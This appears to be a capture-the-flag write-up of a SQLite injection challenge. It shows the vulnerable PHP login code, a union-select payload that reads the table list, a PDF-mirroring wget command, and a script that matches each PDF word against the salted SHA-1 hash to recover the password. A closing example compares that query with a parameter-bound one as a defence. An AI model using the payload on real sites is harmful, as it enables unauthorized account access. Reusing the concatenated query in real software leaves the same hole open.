This challenge tests SQL injection.
A scan of the site turns up robots.txt.
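The page content is as follows. Open login.php; the page source is as shown in the figure. Passing the debug parameter returns the PHP code:

```php
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];

    $db = new SQLite3('../fancy.db');

    // User input is concatenated directly into the SQL text
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    // On a match, the name column of the row is copied into the name cookie
    if(isset($row['id'])){
        setcookie('name', ' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}

if(isset($_GET['debug']))
highlight_file('login.php');
?>
```

The pass variable is concatenated with Salz, hashed with SHA-1, and then compared against password.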
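So the approach is to use SQL injection to recover pass. Note that the database here is SQLite.

First determine the number of injection points. The number of injection points is therefore 2.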
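Next, query the table names:

```sql
union select 1,name from sqlite_master where type='table'--
```

Next, query the table's SQL statement:

```
CREATETABLEUsers%28idintprimarykey%2Cnamevarchar%28255%29%2Cpasswordvarchar%28255%29%2Chintvarchar%28255%29%29
```

Formatted:

```sql
CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))
```

Next, use limit to step through the rows one at a time. The results are as follows.

We guess that favword is in the earlier English pages, so use Kali to download all of them:

```
wget ip -r -np -nd -A .pdf
```

Next, write a script that concatenates each word with Salz, hashes it, and checks whether the result matches 3fab54a50e770d830c0416df817567662a9dc85c: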
```python
# Requires pdfminer.six (Python 3)
from io import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import os
import hashlib


def get_pdf():
    # All PDF files in the current directory
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    # Extract the text of one PDF with pdfminer
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec="utf-8", laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, "rb") as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print("Searching word in " + i)
        pdf_text = convert_pdf_2_text(i).split(" ")
        for word in pdf_text:
            # Same construction as login.php: sha1(word + "Salz!")
            sha1_password = hashlib.sha1((word + "Salz!").encode("utf-8")).hexdigest()
            if sha1_password == "3fab54a50e770d830c0416df817567662a9dc85c":
                print("Find the password : " + word)
                sys.exit()


if __name__ == "__main__":
    find_password()
```

This gives favword as ThinJerboa, so pass is ThinJerboa.
Submit it on admin.php to get the flag.
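
For the defensive side of the login.php query, the following added example (not the challenge's code; Python's sqlite3 module stands in for PHP's SQLite3 class) runs the concatenated query and a parameter-bound version against a constructed in-memory copy of the Users schema. The sample row, the function names and the probe string are assumptions made for the illustration.

```python
import hashlib
import sqlite3

SALT = "Salz!"  # static salt string that login.php appends before sha1()


def make_db():
    """Constructed in-memory database using the Users schema recovered above."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(id int primary key, name varchar(255), "
               "password varchar(255), hint varchar(255))")
    # Constructed sample row, not data from the challenge.
    pw = hashlib.sha1(("example-password" + SALT).encode()).hexdigest()
    db.execute("INSERT INTO Users VALUES (1, 'alice', ?, 'constructed hint')", (pw,))
    return db


def login_concat(db, user, password):
    """Mirrors login.php: user input is spliced into the SQL text."""
    digest = hashlib.sha1((password + SALT).encode()).hexdigest()
    sql = ("SELECT id,name from Users where name='" + user +
           "' and password='" + digest + "'")
    # login.php copies the returned name column into the name cookie,
    # so whatever this row contains becomes visible to the client.
    return db.execute(sql).fetchone()


def login_bound(db, user, password):
    """Hardened form: same query, values passed as bound parameters."""
    digest = hashlib.sha1((password + SALT).encode()).hexdigest()
    sql = "SELECT id,name FROM Users WHERE name=? AND password=?"
    return db.execute(sql, (user, digest)).fetchone()


# Constructed input in the style of the write-up's table-name query.
PROBE = "' union select 1,name from sqlite_master where type='table'--"

if __name__ == "__main__":
    db = make_db()
    print("concat, valid login:", login_concat(db, "alice", "example-password"))
    print("concat, probe      :", login_concat(db, PROBE, "x"))
    print("bound,  valid login:", login_bound(db, "alice", "example-password"))
    print("bound,  probe      :", login_bound(db, PROBE, "x"))
```

In PHP the equivalent change is `SQLite3::prepare()` with `bindValue()` in place of the string-built `query()` call.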